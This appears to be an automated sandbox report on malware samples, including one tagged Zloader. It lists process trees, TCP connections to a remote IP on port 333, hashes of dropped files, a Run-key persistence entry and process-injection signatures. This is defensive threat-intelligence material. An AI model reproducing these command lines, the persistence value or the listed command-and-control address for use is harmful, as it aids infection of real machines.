C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEFBD.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcEFBC.tmp"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\umlxzqh6.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF01A.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcF019.tmp"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\g054v0rw.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF087.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcF086.tmp"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\ivldnje5.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF0C6.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcF0C5.tmp"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\fqj93djl.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF143.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcF142.tmp"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\kpjrcus6.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF1B0.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcF1AF.tmp"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\uwkuu729.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF20D.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcF20C.tmp"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\pxcj0ejf.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF26B.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcF25A.tmp"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\acqm3slk.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF2A9.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcF2A8.tmp"

Network

Country Destination Domain Proto
PT 84.91.119.105:333 tcp
PT 84.91.119.105:333 tcp
PT 84.91.119.105:333 tcp
PT 84.91.119.105:333 tcp
PT 84.91.119.105:333 tcp
PT 84.91.119.105:333 tcp
PT 84.91.119.105:333 tcp

Files

memory/1736-0-0x000007FEF578E000-0x000007FEF578F000-memory.dmp

memory/1736-1-0x000007FEF54D0000-0x000007FEF5E6D000-memory.dmp

memory/1736-2-0x000007FEF54D0000-0x000007FEF5E6D000-memory.dmp

memory/1736-3-0x000007FEF54D0000-0x000007FEF5E6D000-memory.dmp

C:\Windows\System32\MSSCS.exe

MD5 6fe3fb85216045fdf8186429c27458a7
SHA1 ef2c68d0b3edf3def5d90f1525fe87c2142e5710
SHA256 905d572f23883f5f161f920e53473989cf7dffc16643aa759f77842e54add550
SHA512 d2180f2d7ca35362a2dc322801fb0eee22820f2ac317c0be4c788c31d3939d30c9b356bf8daf0746545fb66092471f46f5d47c40403ed68b09415fcca90a125c

memory/2476-11-0x000007FEF54D0000-0x000007FEF5E6D000-memory.dmp

memory/1736-12-0x000007FEF54D0000-0x000007FEF5E6D000-memory.dmp

memory/2476-13-0x000007FEF54D0000-0x000007FEF5E6D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\efzd8rp0.cmdline

MD5 ab7616b54fc7efedeb5e4b716d4adbf7
SHA1 0d69155a0916d14a6e5341a76526ea5a6ea08e82
SHA256 5e08983c0d75d1d3ee27a4a647fb6d33e3c4ea7cc580f030cf147add4e882403
SHA512 a474862bf48e734fcd368185a273246b637536774a0b904ccd50379a9f9c40bcbed1dd06a6a8ef7b61815cf885331dcdae355172511867393e27b64997c07c42

C:\Users\Admin\AppData\Local\Temp\efzd8rp0.0.vb

MD5 88cc385da858aaa7057b54eaeb0df718
SHA1 b108224d4686b5ca3faaeb1c728dfba8740a6eca
SHA256 08a30db98d970e3b6819d5ecff6eab2211ce93f4cd000c09db96ffb294d05020
SHA512 4787835240c3e2364172ac2e7649ec8fecb907c7006c38734e59aa65509f360b4596d5db8de20e0c7388a022e1c2f4f9ba75acabba798bea1d40f688539b7df7

memory/2960-26-0x000000001B780000-0x000000001BA62000-memory.dmp

memory/2960-27-0x0000000002690000-0x0000000002698000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\vbcEF20.tmp

MD5 3906bddee0286f09007add3cffcaa5d5
SHA1 0e7ec4da19db060ab3c90b19070d39699561aae2
SHA256 0deb26dcfb2f74e666344c39bd16544fcaae1a950be704b1fd4e146e77b12c00
SHA512 0a73de0e70211323d9a8469ec60042a6892426e30ad798a39864ba123c1905d6e22cb8458a446e2f45ec19cf0233fa18d90e5f87ec987b657a35e35a49fea3b0

C:\Users\Admin\AppData\Local\Temp\RESEF21.tmp

MD5 c91b8997f85c21459862eda12f5849e0
SHA1 feb4c6ffc8817127563cc7ae3f698d5c4699b786
SHA256 df4f93029675c13ca04afe21d4b7acd65934dfa7ab18aada4aa0960c7925b622
SHA512 f90c55e60c25f7e5f9ab96a481956393f41d13e73c2a11b545cbf40ee22352297d10333ef56e1e6dc09f31cf9f540bd7ba32c25f55956432c804f354bd19a170

C:\Users\Admin\AppData\Local\Temp\vsufvra5.cmdline

MD5 70310afe9b1816b56e9c4eab172c9fa5
SHA1 58ef7f217d4abc4b8bca6a302622c2665b424429
SHA256 037eedc461330e19ce0fa0b3924571f8bbe170dc37ff820e31ba6d5cf1fb55c2
SHA512 dbdd0239cbb9ee847684f44707ca6938a7e56c33dbc2e0bd1282c213cc6fe95f9a58677b2cd755f3ee4feb2be7bb5420f84e070149415ba83673d0fc6e1c7dd4

C:\Users\Admin\AppData\Local\Temp\vsufvra5.0.vb

MD5 debab8fb1bbcbf74ca2ac313d4d5aa7d
SHA1 2a4058378b3df8ef9aa547d1511a425ef043d848
SHA256 0f1d45b4fd6c36693c7d96bda036a41dccffa4313b92940df6ad180982607744
SHA512 8beaad01c2f7541532842aca72324eeee7c582d50db2454bab3288dcb2922fdc1f2a0a3e2347a74e744e92c9f8304916c0f52a18754d2e3a5eb2fe6f9fbf6567

C:\Users\Admin\AppData\Local\Temp\vbcEFBC.tmp

MD5 41857ef7e71c255abd4d5d2a9174e1a6
SHA1 95051d6ae43ff1bd9e5ebc95aa2e7b7c3165cb6c
SHA256 dfcdf12316f3b523895ec611d8e8d9fdc189ab8dde4e86fb962541aeac54e302
SHA512 ec6c5a7729d273be3ff194ffe47056731ab4100e298b7f50108a2599be59c84bd1953a90c4d7390c477257986a18d336d951f590b782f1aa983de7bd4c86e6ac

C:\Users\Admin\AppData\Local\Temp\RESEFBD.tmp

MD5 6dd6eacd1eefb1078b0349fe67979fa6
SHA1 293ff5dfbbd8673edea26a4719c98cfc6f42115b
SHA256 43a12ff2e9cb4c69eed963c32766982915db108d74c38d1878760bdd434ba35c
SHA512 3dacd70ca97c9edb1ffee5579ad3c7a46ec0633b0864099b1448cd8de17c13b54c60868104d244540d37c7985b79414cbca9ec7854f4bee8e729b72a82328adf

C:\Users\Admin\AppData\Local\Temp\umlxzqh6.cmdline

MD5 f8116943f5800067931f679a62085b74
SHA1 4fed63f654449abb548a4ba871c524d95f052e8f
SHA256 9fc684b0296b47ff63785466390ea2cb94464016bbc076345b56841776a91360
SHA512 22c89de61523680af3ad9735df00b9d6974b385830cd6c5aee8cc73f198f0b2fc9161e65aa32a5eb3cc94c1f87409344eb52c5b119f52ad9f4dad5ca929efa29

C:\Users\Admin\AppData\Local\Temp\umlxzqh6.0.vb

MD5 cbdf61e7858f1274d58258756e185765
SHA1 15f0d177b5924a5176ff82f0b79bfa3db558145c
SHA256 d0aa53536d1316c420848db8bb089b24f9669f1baf3be092a7e0f0a0bc1b997d
SHA512 ab21cbb170e38a2600db2587ce92b74499107e361d55bbcd5e6281568307ffb1c087aba905c042e2e8960e2e554c84057a197dc4c03121b682868def94c5a038

C:\Users\Admin\AppData\Local\Temp\vbcF019.tmp

MD5 453916f7e3952d736a473b0e2eea5430
SHA1 b79ccb2b555a81b8db470ec9fcaea26d42ef1c8b
SHA256 b0f8b94a35a12060c70e9f81641be22cbf1f1794c73260f48a2e6e46608623fe
SHA512 86d32a03cf04ef8640075c82e5fecb23034413a41b80b81c900a423b03f44589f774f68f83561465e7c9ce46512c818eef5a90e5ed9f7b3f86b592be34fa367f

C:\Users\Admin\AppData\Local\Temp\RESF01A.tmp

MD5 e0dd5c862756f65cac03b74098af510c
SHA1 8952b5da42ff8afcb3272463d48dbeb490d002b3
SHA256 eb80fc81eef4ff79d8da9da54cbbbb433031dacffedb79f49294f07937572744
SHA512 a7604a0876ac13edbeca7c277249eae776b548e4aba33ddf7cc8963ed4d82cb7f71df8040c6f3f2b8c6bb6788c2836d243b02513793973be04ec8ed54109d289

C:\Users\Admin\AppData\Local\Temp\g054v0rw.0.vb

MD5 d8ec3923c7b4bf7ae4ba2dd32ba5174f
SHA1 bd232f852b5428b0360c9708604793deb513c36e
SHA256 316f5f33d99324745cbdad4dfe3ece93321e270a177f3646d78d72d1f7a1d648
SHA512 062694e7951b534e5c93d4d2e65c65cc59b9be7f3f1e469b1679d61e03f1770246222009461c6e2a8ddfe41fa367ed6ebd83f53e0a1c3f24db5e97932558ce11

C:\Users\Admin\AppData\Local\Temp\g054v0rw.cmdline

MD5 93938249769eca5ae2b3fd002871fc98
SHA1 c1106068f3661c54f42c185c35fcc279fbfc70b4
SHA256 a972140fee13be4980ed64385f5175d51bf0dc2becfae737c74eb6f170028782
SHA512 82b009a492bd1d927c1c2d0f1be70cbb081c470e2da58704e09539389c2628f2161fa2f0936e4ebab13e7d63cb4eb55ccc484d005372278cb8a5c416bac26750

C:\Users\Admin\AppData\Local\Temp\vbcF086.tmp

MD5 6ed26221ebae0c285cdced27b4e4dbac
SHA1 452e9440a9c5b47a4f54aefdde36c08592e17a38
SHA256 aacdfb10fa949c74577bb1778fe2f3bab88b3e587c07cfffb003e059097e9e6c
SHA512 c604368a7b4adfbec5b6898c8880ea684bd085d967c1ebd087c9bed065fe3e2575c8298a9ccaa454d68496386667db998e2a04248dda2ab35905c8a9b1135cce

C:\Users\Admin\AppData\Local\Temp\RESF087.tmp

MD5 9871db32d2283905b46d4e52eb458721
SHA1 d541adf006b84fd60b2a1e744cb37e0ddabc2e74
SHA256 9520d76bd2f306bc64e248570357e2d48805bd9f4992d0601c3f138674ca60b9
SHA512 a9a1e45334875037d7ec56a411084d5724225636136fabd8061083fb12c4a21a0720bac38861e2cd9ba0018fc297c06cb6c84da1cfbeb3d5d8b821be60493939

C:\Users\Admin\AppData\Local\Temp\ivldnje5.cmdline

MD5 c89e1df42c26a3445847b2c4e72f2764
SHA1 35fbe418e607c078a968e4c3876c22a2a8a91fb1
SHA256 320a8416b4f5b9f89738d016029c643a039069854a772be32d059ad990e6b264
SHA512 09532fb97727404c7fb90d42e305908cb18f17622020334ddd085c2465d789f26264e4554cda24e94dec717421b01086a2f99130f1b782eb2370cd04e4d3f138

C:\Users\Admin\AppData\Local\Temp\ivldnje5.0.vb

MD5 ac972015bef75b540eb33503d6e28cc2
SHA1 5c1d09fcf4c719711532dcfd0544dfc6f2b90260
SHA256 fa445cc76cde3461a5f1f1281fefcb0c7db69b2685f8a67a06a0f33a067e74e7
SHA512 36b2e1f7b7a6f2c60788f88d95bfdc53b7d261c203eb637a36fbd07d81bc46edc87e528f1987df73963cb75ca2f19c3a4b3df9ade52d5768ecec23753099cc83

C:\Users\Admin\AppData\Local\Temp\RESF0C6.tmp

MD5 69cbc3ae99360a8224791753d971381d
SHA1 4c7d241ac26e74b17e57cc53c5f263f159a00160
SHA256 e021ea9436e0f00723a21c427ea6d88e02468b0dce7eda1f419ee0ef2f067d02
SHA512 ab67f73194cd421f9ffd8d12e418186eafe33faf83fd4a7ba58439c1f501b530ff14d6fc298f1acab577aa230f3626ed3e30e5b9c38859908fd7bf0e983e686f

C:\Users\Admin\AppData\Local\Temp\fqj93djl.cmdline

MD5 25d6a66f27f01f8bab2eb9584d9309b2
SHA1 2a753dcac1a4509781501290b21ab49d09844376
SHA256 3865f16e82bd43b3d566806d3d1094e65fe6a21e81bb8b6ec7c796cdd8fcece5
SHA512 91d3146d48e10c4c0a291003b41ba6338fe4343678b04649e52e27a0e4de9511b8551aefa95ec22a93fb7f09e680e2a69c78c35ea4dae5b547d2ffb5beb1c011

C:\Users\Admin\AppData\Local\Temp\fqj93djl.0.vb

MD5 ce1182df38f7b4c7a89d1e4d1886b0d8
SHA1 ba5cdc6e13b761912d14ec042639566eebc23eca
SHA256 e87616f590de6878e0a1051e52bb968d39bad4c7b086cdaecc064c6aa9582e3a
SHA512 7be8358cbcefde4b1e1a28480eaea0daf5bbbd25aba3d1bd8c589bad3adb63a90551830efabc6e0d2b01a406e41e44c5797502abc88566694fbff7c2091e05a0

C:\Users\Admin\AppData\Local\Temp\vbcF142.tmp

MD5 b548259248343e12d417d6c938cf8968
SHA1 19703c388a51a7ff81a3deb6a665212be2e6589a
SHA256 ab2ce0a14c78f836d2b134a37183b6d89a78b964ea5607940fa5d940d32a0366
SHA512 73a3902f000a042a448446f6851d6ad61a30bfdfed7d7903b5dad0f368ee43cd6da3b8ba817ac95be1a7427902aba0642af8ccddc4d442867465f1f1f5bf6f81

C:\Users\Admin\AppData\Local\Temp\RESF143.tmp

MD5 2f0a9f120c8c9926234f7bbe908fefc4
SHA1 c0d8f76e998a77099d5821421fa3c7b1caaf9b77
SHA256 bb7e115abba9777aacd53e31465b4888c110a65e6b89454e2543c203717f9898
SHA512 3054a37b420cd5765523774175938118c4bb419afd6c9384a73e018751802076def42a5099fb45eea648b21c137adabd44ef35eee9ef8639c599eb03a2d4719d

C:\Users\Admin\AppData\Local\Temp\kpjrcus6.cmdline

MD5 8fe5129887f2aaaf4c806e05221df522
SHA1 ba1b68821dd50b286858d8bcf82b5b21ce73c8a0
SHA256 68fd018b229a3da80b6682b140d728f32504a0c47d9fe5a20c42d73d173aca1a
SHA512 0a025adae4a5a2bf45d1921916cf773d74db73ea88125f5a34fb75a871936c42e83b335f39e82637005505acba7e7f2075024cf11d82c5cd8768d25df793242a

C:\Users\Admin\AppData\Local\Temp\kpjrcus6.0.vb

MD5 b19384e98248a2c238e2360d2fecf049
SHA1 25f5ab6303d0a81f4ef3cc44c0bb53dd3e564fad
SHA256 296feb4019e37af5174b813d3ac19fa1b17c4db9ad91b06eba610939983e3262
SHA512 e9e4dd4a302d643fd1d0dd46d058ca7a45c8e6d8b299c129e1a412d1d3309cfe4d4da6f9d893460dde7e96c40414d65e02dbab9c1411dd945581e749ae8438e4

C:\Users\Admin\AppData\Local\Temp\RESF1B0.tmp

MD5 328736ca231bdaf7d3c522af35e58b93
SHA1 67bd33cf08d3d81059b0cc16c90611230faddb4e
SHA256 f4ab665f6da0ca252a113954e6f7e357a857380c534bffde338515d35c1e87d6
SHA512 fcc60e9fde3c54b81d7f8f8426803e7e3a7358e39ec3a5ed0922061a5e5074b6950b874a6a5e49a372d7fd4a5831a550dfb52c6a05c1e3e68ff06e74785302e5

C:\Users\Admin\AppData\Local\Temp\vbcF1AF.tmp

MD5 ba2c43095c1c82b8024e968d16bee036
SHA1 41ea006dbc9f0f6e80941d7547a980a1dde868e0
SHA256 1209067183104b41f03a5be0f377dc1865155cc84bdb509b871b7ce3366aae72
SHA512 00dc93cdb8c4cb0a681f99d24c59216a721bce963d76bad972e29cf92aafd74e4af46632c00f5aef4ce3160927db9df8aa9a8926ea4a5cb6974b499785569e61

C:\Users\Admin\AppData\Local\Temp\uwkuu729.cmdline

MD5 3155ac7089552690d167b6f363f05fa9
SHA1 7e11be9c6a2fee9f4d42dd11e8fbeba90848d4ee
SHA256 cfff4d51de6e1543e62e80df82fbe720d09b89ae8f511b2d9d3a0583338a48e4
SHA512 d7a41af3c2264450576da0916de69773a71b74eedeeb202acf1b9534e6801991ca691b409bf36ae3d9931c18fc588fab88719416c1dcf3a4b4ea421eb0104328

C:\Users\Admin\AppData\Local\Temp\uwkuu729.0.vb

MD5 5ce3977a153152978fa71f8aa96909e9
SHA1 52af143c553c92afc257f0e0d556908eaa8919cb
SHA256 e07a7bd0c2901d3a349ab55e936b34de2d0abb5f2dc555cc128773b8045d3eed
SHA512 eaee02ceade0211be70a4710b28fdf043d5c540928e2095ead924a44c2edfca8fc6499395d1b7f5deee96394fb5309362fb87e45ee195094ec39d5fa11909d77

C:\Users\Admin\AppData\Local\Temp\vbcF20C.tmp

MD5 dac60af34e6b37e2ce48ac2551aee4e7
SHA1 968c21d77c1f80b3e962d928c35893dbc8f12c09
SHA256 2edc4ef99552bd0fbc52d0792de6aaa85527621f5c56d0340d9a2963cbc9eed6
SHA512 1f1badd87be7c366221eaa184ae9b9ae0593a793f37e3c1ce2d4669c83f06de470053550890ad6781b323b201a8b9d45a5e2df5b88e01c460df45278e1228084

C:\Users\Admin\AppData\Local\Temp\RESF20D.tmp

MD5 28830ac2ab911243475e53bc9a93313c
SHA1 efe81d1952837667f4d31f23f08dd48e7613af82
SHA256 0aa124fb5012d0d4f065f4a3c8c5cc08428feba5021e009105df050de5ebbbbd
SHA512 87746d3d7b950aa20b178ba1231de0cc14c62b36f9829690ed35e17f2cb82f775bf9dbebf06d5dc72adc1f15c60fe5fe65c346fb67565b88127bd3396020cd36

C:\Users\Admin\AppData\Local\Temp\pxcj0ejf.cmdline

MD5 338c81614193bb22a5f18e6f2a619837
SHA1 6fdf4f532e40a2293f59e54f7cdbb9252d204d91
SHA256 fce8baa3d9dd3f181fba5fb1ae1a8e390b8bf90ffab6f396b5c8c6f0db9ec7cc
SHA512 7cb663b5fd2f38e69086f8bc9810d8273233aa51da81aa73d4c0fb69debce86c687b6bc055a832baa13c1a374df36bb27cee09979a571e591c1d598489bb4c3b

C:\Users\Admin\AppData\Local\Temp\pxcj0ejf.0.vb

MD5 658573fde2bebc77c740da7ddaa4634b
SHA1 073da76c50b4033fcfdfb37ba6176afd77b0ea55
SHA256 c07206283d62100d426ba62a81e97bd433966f8b52b5a8dd1451e29a804a1607
SHA512 f93c7f4378be5eca51161d1541d772a34c07884c9d829608c6fa21563df5691920394afe9da1174ad5c13f773a588b186d1d38a9d375a28562eb58ca4a8b8fbf

C:\Users\Admin\AppData\Local\Temp\RESF26B.tmp

MD5 b2fc7b2e4ef65597982af5133bb84354
SHA1 20185ce7512ffbd04d5cc282639803830d33d67d
SHA256 7846d36463ba93c429da991f4be7a523ecfe0aafea6f8fbf957d8f68160cbb80
SHA512 7412ad1eb8a3702d0df511355bc21b44bbea906eaff01dea83059c8ef15e9209586cb54e5bb6e6ca9f145460c73f65d85bae8d02a0a20c0b5a308f1cf486520f

C:\Users\Admin\AppData\Local\Temp\acqm3slk.cmdline

MD5 0ad894a858ab275ad1d74598b354c4b1
SHA1 9bf5d76d2cf58e878a2ecf66f711bc30e9e20ec3
SHA256 a737f13dc00b6ff10182139860953f56f1fce32798f7a7b9f0a42a1e7f309ee5
SHA512 5dc93613875ed255d53bca63f12038540b7759da6213849b7deb94ca2f895cb077e9f3d022062472d39178a4d359fe7b62fa1108360636dab9335c2b5193e48e

C:\Users\Admin\AppData\Local\Temp\acqm3slk.0.vb

MD5 3c3d3136aa9f1b87290839a1d26ad07a
SHA1 005a23a138be5d7a98bdd4a6cc7fab8bdca962f4
SHA256 5b745f85a39312bfa585edbd7e3465371578b42fa639eded4cdad8c9f96b87fd
SHA512 fbb085ffcd77ac96c245067fd96a0c20492d55331161f292975b0c11386424a96534a500133217f84d44455e16139d01230455bce5db3d472271620c29381f60

C:\Users\Admin\AppData\Local\Temp\vbcF2A8.tmp

MD5 7a707b422baa7ca0bc8883cbe68961e7
SHA1 addf3158670a318c3e8e6fdd6d560244b9e8860e
SHA256 453ad1da51152e3512760bbd206304bf48f9c880f63b6a0726009e2d1371c71c
SHA512 81147c1c4c5859249f4e25d754103f3843416e3d0610ac81ee2ef5e5f50622ea37f0c68eeb7fa404f8a1779dc52af02d2142874e39c212c66fa458e0d62926a9

C:\Users\Admin\AppData\Local\Temp\RESF2A9.tmp

MD5 77ffda0bc2898bfe30cf0eb8852d6c25
SHA1 e19bbd0df96044e75a3cc3ee575d4ffc673e7a87
SHA256 c1f8c4659d88dbefd517d142f41b210dba6549357016e9ff2c628bc0bc2e011e
SHA512 ff8b9a315c1904486560a1f0274f6624f93b1d92aa6ba8666edf9849c3243bac282d395762c0a1bb7f3d851787339707ff05abb196966da1b4f48fcdcc68f8f2

Analysis: behavioral1

Detonation Overview

Submitted

2024-12-02 00:53

Reported

2024-12-02 00:59

Platform

win7-20241010-en

Max time kernel

118s

Max time network

125s

Command Line

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\08751be484e1572995ebb085df1c2c6372084d63a64dce7fab28130d79a6ea2d.dll

Signatures

Zloader family

zloader

Zloader, Terdot, DELoader, ZeusSphinx

trojan botnet zloader

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Windows\CurrentVersion\Run\Boihyb = "rundll32.exe C:\\Users\\Admin\\AppData\\Roaming\\Ahafu\\uficbif.dll,DllRegisterServer" C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2176 set thread context of 2872 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\msiexec.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\regsvr32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2088 wrote to memory of 2176 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2088 wrote to memory of 2176 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2088 wrote to memory of 2176 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2088 wrote to memory of 2176 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2088 wrote to memory of 2176 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2088 wrote to memory of 2176 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2088 wrote to memory of 2176 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2176 wrote to memory of 2872 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\msiexec.exe
PID 2176 wrote to memory of 2872 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\msiexec.exe
PID 2176 wrote to memory of 2872 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\msiexec.exe
PID 2176 wrote to memory of 2872 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\msiexec.exe
PID 2176 wrote to memory of 2872 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\msiexec.exe
PID 2176 wrote to memory of 2872 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\msiexec.exe
PID 2176 wrote to memory of 2872 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\msiexec.exe
PID 2176 wrote to memory of 2872 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\msiexec.exe
PID 2176 wrote to memory of 2872 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\msiexec.exe

Processes

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\08751be484e1572995ebb085df1c2c6372084d63a64dce7fab28130d79a6ea2d.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\08751be484e1572995ebb085df1c2c6372084d63a64dce7fab28130d79a6ea2d.dll

C:\Windows\SysWOW64\msiexec.exe

msiexec.exe

Network

N/A

Files

memory/2872-0-0x0000000000090000-0x00000000000B5000-memory.dmp

memory/2872-1-0x00000000000C0000-0x00000000000C1000-memory.dmp

memory/2872-3-0x0000000000090000-0x00000000000B5000-memory.dmp

Analysis: behavioral10

Detonation Overview

Submitted

2024-12-02 00:53

Reported

2024-12-02 00:58

Platform

win10v2004-20241007-en

Max time kernel

91s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2c01b007729230c415420ad641ad92eb.exe"

Signatures

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\2c01b007729230c415420ad641ad92eb.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\2c01b007729230c415420ad641ad92eb.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3280 wrote to memory of 880 N/A C:\Users\Admin\AppData\Local\Temp\2c01b007729230c415420ad641ad92eb.exe C:\Users\Admin\AppData\Roaming\wou\odm.exe
PID 3280 wrote to memory of 880 N/A C:\Users\Admin\AppData\Local\Temp\2c01b007729230c415420ad641ad92eb.exe C:\Users\Admin\AppData\Roaming\wou\odm.exe
PID 3280 wrote to memory of 880 N/A C:\Users\Admin\AppData\Local\Temp\2c01b007729230c415420ad641ad92eb.exe C:\Users\Admin\AppData\Roaming\wou\odm.exe
